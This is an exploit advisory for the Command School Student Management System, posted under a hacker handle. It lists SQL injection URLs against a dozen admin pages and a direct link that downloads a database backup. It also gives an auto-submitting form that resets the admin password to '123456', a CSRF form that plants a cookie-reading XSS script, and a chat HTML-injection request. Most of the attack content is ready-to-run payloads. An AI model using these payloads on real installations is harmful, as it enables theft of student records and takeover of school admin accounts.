Command School Student Management System V1.06.01  - Multiple Vulnerabilties
============================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://sourceforge.net/projects/swifttide/
####################################################################

I. Multiple Sql Injection

##############
VULNERABILITY
##############
/admin_school_names.php
-----------------------------------------------------------------------------
line (27): $action=get_param("action");
line (54-56)
case "edit":
$school_names_id=get_param("id");
$sSQL="SELECT school_names_desc FROM school_names WHERE
school_names_id=$school_names_id";


note:[all Files same error]
-----------------------------------------------------------------------------

#########
EXPLOIT
#########

localhost/sw/admin_school_names.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_subjects.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_grades.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_terms.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_school_years.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_sgrades.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_media_codes_1.php?action=edit&id=null+and+1=2+union+select+version(),2,3
localhost/sw/admin_infraction_codes.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_generations.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_relations.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_titles.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/health_allergies.php?action=edit&id=null+and+1=2+union+select+version()


II. Backup Download

##############
VULNERABILITY
##############

/Backup/backup_ray2.php (LINE: 78-126)

-----------------------------------------------------------------------------
// SET THE NAME OF THE BACKUP WITH A TIMESTAMP
$bkup = 'mysql' . date('Ymd\THis') . $db_name . '.txt';
$fp   = fopen($bkup, "w");


// GET THE LIST OF TABLES
$sql = "SHOW TABLES";
$res = mysql_query($sql);
if (!$res) die( mysql_error() );
if (mysql_num_rows($res) == 0) die( "NO TABLES IN $db_name" );
while ($s = mysql_fetch_array($res))
{
    $tables[] = $s[0];
}


// ITERATE OVER THE LIST OF TABLES
foreach ($tables as $table)
{

// WRITE THE DROP TABLE STATEMENT
    fwrite($fp,"DROP TABLE `$table`;\n");

// GET THE CREATE TABLE STATEMENT
    $res = mysql_query("SHOW CREATE TABLE `$table`");
    if (!$res) die( mysql_error() );
    $cre = mysql_fetch_array($res);
    $cre[1] .= ";";
    $txt = str_replace("\n", "", $cre[1]); // FIT EACH QUERY ON ONE LINE
    fwrite($fp, $txt . "\n");

// GET THE TABLE DATA
    $data = mysql_query("SELECT * FROM `$table`");
    $num  = mysql_num_fields($data);
    while ($row = mysql_fetch_array($data))
    {

// MAKE INSERT STATEMENTS FOR ALL THE VALUES
        $txt = "INSERT INTO `$table` VALUES(";
        for ($i=0; $i < $num; $i++)
        {
            $txt .= "'".mysql_real_escape_string($row[$i])."', ";
        }
        $txt = substr($txt, 0, -2);
        fwrite($fp, $txt . ");\n");
    }
}
// ALL DONE
fclose($fp);
-----------------------------------------------------------------------------

#####################################################
EXPLOIT
#####################################################

<html>
<title>Iphobos Blog</title>
<label><a href="http://localhost/sw/backup/backup_ray2.php" class="button
white">Backup Download</a></label>
</html>



III. Cross Site Request Forgery

[Change Password Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://localhost/sw/admin_change_password.php">
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="action" value="update" />
</form>
</body>
</html>


IV. Cross Site Scripting

[CSRF with XSS Exploit]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://localhost/sw/add_topic.php">
<input type="hidden" name="topic"
value="<script>alert(document.cookie);</script>" />
<input type="hidden" name="detail" value="Iphobos Blog" />
<input type="hidden" name="Submit" value="Submit" />
</form>
</body>
</html>

V. Html File Injection

##############
VULNERABILITY
##############
/chat/message.php (LINE: 4-12)
-----------------------------------------------------------------------------
           $f = fopen('msg.html',"a+");
        } else {
           $f = fopen('msg.html',"w+");
        }
      $nick = isset($_GET['nick']) ? $_GET['nick'] : "Hidden";
      $msg  = isset($_GET['msg']) ? htmlspecialchars($_GET['msg']) : ".";
      $line = "<p><span class=\"name\">$nick: </span><span
class=\"txt\">$msg</span></p>";
        fwrite($f,$line."\r\n");
        fclose($f);

-----------------------------------------------------------------------------

#########
EXPLOIT
#########

localhost/sw/chat/message.php?line=&nick=IPHOBOS&msg=BLOG

After Exploit Go To localhost/sw/chat/msg.html
you will find the injection information

####################################################################